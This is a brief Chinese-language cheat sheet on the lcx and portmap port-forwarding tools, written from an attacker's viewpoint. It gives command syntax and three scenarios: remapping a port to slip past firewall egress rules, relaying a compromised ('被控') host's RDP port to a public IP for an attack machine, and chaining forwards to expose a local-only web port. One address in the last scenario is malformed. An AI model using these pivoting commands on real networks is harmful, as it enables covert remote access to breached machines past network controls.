端口转发工具windows:lcx  linux:portmap

转发端口:lcx.exe -slave 公网ip 端口 内网ip 端口

监听端口:lcx.exe -listen 转发端口(未使用的)

映射端口:lcx.exe -tran 映射端口号 目标ip 目标端口

注:如果端口被绑定了服务的话,需要进行端口复用

 

情况一:目标ip,某端口不能出网,可以将该端口映射到防火墙允许出网的端口上

lcx.exe 不能出网的端口 目标ip 可以出网的端口

 

情况二:

  开启端口监听

  lcx.exe 1234 12345  1234端口再次转发到12345端口

  lcx.exe -slave 公网ip 端口 被控目标ip 端口

  lcx -slave 1.1.1.1 1234 127.0.0.1 3389

  外网攻击机连接本地的 12345端口 然后mstsc 127.0.0.1:12345

 

情况三:内网主机不能访问外网,但是可以访问同网段的内网机器,同时80端口只能本地访问,但是8080端口对外开放。

  1、lcx.exe -tran 8080 127.0.0.1:80

  2、lcx -slave 192.168.56.1:4444 192.168.56.101:8080

  3、lcx -listen 4444 1234

  4、用公网的机器连接192.168.56::1234的端口